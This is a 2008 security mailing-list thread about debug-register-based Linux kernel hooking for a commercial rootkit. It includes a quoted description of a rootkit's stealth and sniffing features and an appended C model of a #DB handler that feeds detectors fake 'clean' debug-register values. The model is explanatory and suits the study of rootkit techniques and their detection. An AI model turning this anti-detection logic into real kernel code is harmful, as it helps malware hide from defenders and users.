From: Bas Alberts (bas.albertsimmunityinc.com)
Date: Thu Sep 04 2008 - 11:59:21 CDT
Just as a side note, I was unaware of Pierre's research paper until today
(not much up on the Italians :)). But his paper is most definitely a
go-to reference for this general hooking approach. Even though it is in
Italian, it's pretty readable and well researched. Combined with the
Intel SDM, the work presented becomes pretty straightforward.
I've added it to the references in the DR README, and feel that it
serves as an excellent reference for the general approach as far as
Linux debug-register-based kernel hooking specifics go.
To answer some questions I've been getting off-list:
- Yes, SMP support will be added
- Yes, x86_64 support will be added
- Yes, proper GD support will be added
The initial implementation was written on the spot and in the span of a
week. Because the engine is used in the CANVAS rootkit it will receive
continuous support and updates. Feel free to submit feature requests.
Senior Security Researcher
Pierre Falda wrote:
> Hi people,
> if anyone else is still interested in these things and wants to see some
> 'old' code: in 2006 I published an article and a 2.4.x/2.6.x (tested
> up to .19) Linux rootkit
> which loads itself through kmem and fully implements these techniques. It's
> a fully working rootkit with a debug registers engine and with
> anti-detection checks via GD and CPU emulation to protect itself too. It has
> all modern rootkit hiding features, extra anti-detection features
> like kmem/mem/kcore/procfs on-the-fly patching, and most add-ons like TTY and
> application sniffing. It works by watching the SCT and supports
> syscall invocations through int 80 and sysenter, and so on.
> You can find the source code here:
> or here
> The article about the hardware engine (in Italian) is here
> and if you want the printed version in a scientific publication you can go
> Have a nice day!
> Pierre Falda 'darkangel'
> Antifork Research Inc.
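The thread above talks about a debug-register hooking engine (DR0-DR3 armed on syscall-table entries or handler entry points, a hooked #DB handler, and "proper GD support", i.e. using the General Detect bit so that anyone who touches the debug registers traps into the engine). The following is an added example, not code from the CANVAS DR engine or from Pierre Falda's rootkit: a user-space model of the DR7/DR6 bookkeeping such an engine needs. The bit encodings follow the Intel SDM (vol. 3, "Debug Registers"); the `dr_engine` structure, the `db_handle` dispatch and the syscall-table address are assumptions chosen for illustration, and nothing here reads or writes real debug registers, so it runs unprivileged.

```c
/* Added example (not the CANVAS or Antifork code): DR7/DR6 encoding and a
 * model of the #DB handler of a debug-register hooking engine with GD.
 * Encodings per Intel SDM vol. 3, "Debug Registers"; engine layout is an
 * assumption for illustration. No real debug register is touched. */
#include <stdint.h>
#include <stdbool.h>
#include <string.h>

enum dr_rw  { DR_RW_EXEC = 0, DR_RW_WRITE = 1, DR_RW_IO = 2, DR_RW_RDWR = 3 };
enum dr_len { DR_LEN_1 = 0, DR_LEN_2 = 1, DR_LEN_8 = 2, DR_LEN_4 = 3 };

#define DR7_GD   (1ULL << 13)  /* General Detect: #DB on any MOV to/from DRn */
#define DR6_BD   (1ULL << 13)  /* set in DR6 when the #DB was caused by GD    */
#define DR6_B(n) (1ULL << (n)) /* breakpoint slot n hit                       */

/* Program breakpoint slot n in DR7. Returns 0 on success, -1 for encodings
 * the SDM forbids or this engine does not use: slot outside 0..3, execute
 * breakpoints with LEN != 00, or I/O breakpoints (need CR4.DE). */
static int dr7_set_bp(uint64_t *dr7, int n, enum dr_rw rw, enum dr_len len, bool global)
{
    if (n < 0 || n > 3 || rw == DR_RW_IO) return -1;
    if (rw == DR_RW_EXEC && len != DR_LEN_1) return -1;
    uint64_t v = *dr7;
    v &= ~(0xFULL << (16 + 4 * n));                        /* clear RWn/LENn */
    v |= ((uint64_t)rw | ((uint64_t)len << 2)) << (16 + 4 * n);
    v &= ~(3ULL << (2 * n));                               /* clear Ln/Gn    */
    v |= (global ? 2ULL : 1ULL) << (2 * n);
    *dr7 = v;
    return 0;
}

/* Which breakpoint slot is flagged in DR6, or -1 if none (BD/BS/BT only). */
static int dr6_hit_slot(uint64_t dr6)
{
    for (int n = 0; n < 4; n++)
        if (dr6 & DR6_B(n)) return n;
    return -1;
}

/* Engine state (assumed layout): the real values it installed plus the
 * "clean" values any other reader of DR0-3/DR7 should be shown. */
struct dr_engine {
    uint64_t dr[4];        /* real DR0-DR3: hooked addresses             */
    uint64_t dr7;          /* real DR7, with GD set                      */
    uint64_t clean_dr[4];  /* what a detector reading DR0-3 should see   */
    uint64_t clean_dr7;    /* what a detector reading DR7 should see     */
};

enum db_result { DB_NOT_OURS = 0, DB_HOOK_HIT = 1, DB_GD_EMULATED = 2 };

/* Core of the hooked #DB handler. dr6 is the status the CPU delivered.
 * For a GD fault, the faulting MOV is described by (is_read, regno, gpr):
 * a read is answered with the clean value, a write is swallowed so the
 * engine's own registers are never clobbered. The SDM states the CPU clears
 * DR7.GD when it delivers the GD #DB, so the handler re-arms it; because it
 * is a fault, the caller must also step RIP past the MOV. For a real hit,
 * the slot is returned in *slot so the caller can dispatch the hook. The
 * Bn flags can be set for slots that are not enabled, hence the Ln/Gn check. */
static enum db_result db_handle(struct dr_engine *e, uint64_t dr6,
                                bool is_read, int regno, uint64_t *gpr, int *slot)
{
    if (dr6 & DR6_BD) {
        if (is_read) {
            if (regno >= 0 && regno <= 3) *gpr = e->clean_dr[regno];
            else if (regno == 7)          *gpr = e->clean_dr7;
            else if (regno == 6)          *gpr = dr6 & ~DR6_BD; /* hide our BD */
        } else {
            /* Swallow the write, but remember it so later reads stay consistent. */
            if (regno >= 0 && regno <= 3) e->clean_dr[regno] = *gpr;
            else if (regno == 7)          e->clean_dr7 = *gpr & ~DR7_GD;
        }
        e->dr7 |= DR7_GD;                                  /* re-arm GD */
        return DB_GD_EMULATED;
    }
    int n = dr6_hit_slot(dr6);
    if (n < 0 || !(e->dr7 & (3ULL << (2 * n)))) return DB_NOT_OURS;
    *slot = n;
    return DB_HOOK_HIT;
}

/* Build an engine that watches one 4-byte syscall-table slot for reads and
 * writes (the "watching SCT" case) and arms GD. The address is a constructed
 * placeholder, not a real kernel symbol. */
static struct dr_engine engine_for_sct_slot(uint64_t sct_entry_addr)
{
    struct dr_engine e;
    memset(&e, 0, sizeof e);
    e.dr[0] = sct_entry_addr;
    dr7_set_bp(&e.dr7, 0, DR_RW_RDWR, DR_LEN_4, false);
    e.dr7 |= DR7_GD;
    return e;
}
```

The practical caveat the model makes visible: GD only hides the registers from code that goes through MOV DRn; it does nothing against a detector that compares its own IDT entry for vector 1 against the kernel's original, and it must be re-armed on every GD fault and on every CPU (hence the SMP item in the list above).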